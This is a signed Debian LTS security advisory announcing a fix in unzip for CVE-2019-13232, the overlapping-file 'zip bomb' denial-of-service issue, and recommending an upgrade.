-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Package : unzip Version : 6.0-16+deb8u4 CVE ID : CVE-2019-13232 Debian Bug : 931433
David Fifield discovered a way to construct non-recursive "zip bombs" that achieve a high compression ratio by overlapping files inside the zip container. However the output size increases quadratically in the input size, reaching a compression ratio of over 28 million (10 MB -> 281 TB) at the limits of the zip format which can cause a denial-of-service. Mark Adler provided a patch to detect and reject such zip files for the unzip program. For Debian 8 "Jessie", this problem has been fixed in version 6.0-16+deb8u4. We recommend that you upgrade your unzip packages. Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -----BEGIN PGP SIGNATURE----- iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAl0iUXFfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeSNmg//aYlnFC/oldyGW2Y3fDNrE+BDvUVsa692Y2H6g1AIqzHCtMBlRd4ZHU7A 80ebCNDQOuZSrG5MhadlxfpKhMbLzlwYjxEGbl/q7b6wKmj6Zs0JoRkR+gkTuyiv ivHSe9wBmsWK0dXjw++8agoK2XPBDSVfCMEsFhpOM07dsE0gEU0p5Z3Dziefqfi8 HE3xotd3pp8SzM+0nBiOpVyC6ZdvIlrw5LuF+aTADBclAmuDna6JJnyz1D72auHT il9kjbqoSCD0mL/iDYXvRuGanRNAN7UIc+rrCWNn/DsYpX7A+o+cncvLK2lKxmZP 1EuQIwh1U6lfiBd4ipvFkGdt4pzHnBsdQc4Z3oFEbEqLqhNZpzzFcIuc4KIxRHkt KQGjEzQ4desb/MdtD05RmmmHZu3axpuZIyKzrc2t8XIR69KQpDOufHOYfVWc0Iok ZloyyVmTDOxOoP/TIk5UNXPhHJ0G6MwRxIMKdj2x5g9kswlBAa/67KFqrt9FZ3Ng MqQH1/fLgGsUJhUyANJHApb6+OoxsNg03MeP59BosXr79X9BbNaTOIh9TdCjklRH yJzUjg9A6B/b0wiIEMrUvf5IsXCJo1jIiss0a3gCcGPZWdJQGNDKm553PE9EjjzP zOtJOHCjKbhOwVIHkb3sUTPAc+mTMoiJa/YhbeKl/cW+0jXizmQ= =197w -----END PGP SIGNATURE-----
